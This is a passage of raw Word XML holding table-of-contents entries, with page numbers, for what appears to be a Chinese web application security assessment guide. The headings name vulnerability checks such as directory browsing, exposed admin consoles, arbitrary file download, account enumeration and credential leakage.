              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="09DD6D49" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434477" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.1.7 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>入侵痕迹残留</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7 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>14</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0EB63A61" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434478" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.1.8 HTTP</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>头信息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8 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>15</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7FEA4735" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434479" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.1.9 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>目录浏览</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9 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>15</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="59BAC51C" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434480" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.1.10 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>默认页面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0 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>16</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6D28A759" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434481" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.1.11 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>存在可访问的管理后台入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1 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>17</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4BA8FBEA" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434482" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.1.12 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>存在可访问的管理控制台入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2 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>18</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="2CD52024" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434483" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.1.13 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>参数溢出</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3 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>23</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="073EE0A5" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434484" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.1.14 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>任意文件下载</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4 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>24</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="123CCC12"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85" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.2 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>信息猜解</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85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26</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="416D95DF" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434486" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.2.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>邮件内容中请求链接可预测</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6 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>26</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="241B62DB"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87" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.3 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>数据猜解</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87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27</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="49AC330A" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434488" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.3.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>账号枚举</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8 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>27</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6E2EEB69" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434489" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.3.2 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>账号密码共用</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9 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>28</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="190A00C0"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90" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.4 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>认证信息泄漏</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90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29</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="2FCB84EA" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434491" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.4.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>传输过程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1 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>29</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="2DB6E392" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434492" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.4.2 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>会话变量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2 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>30</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
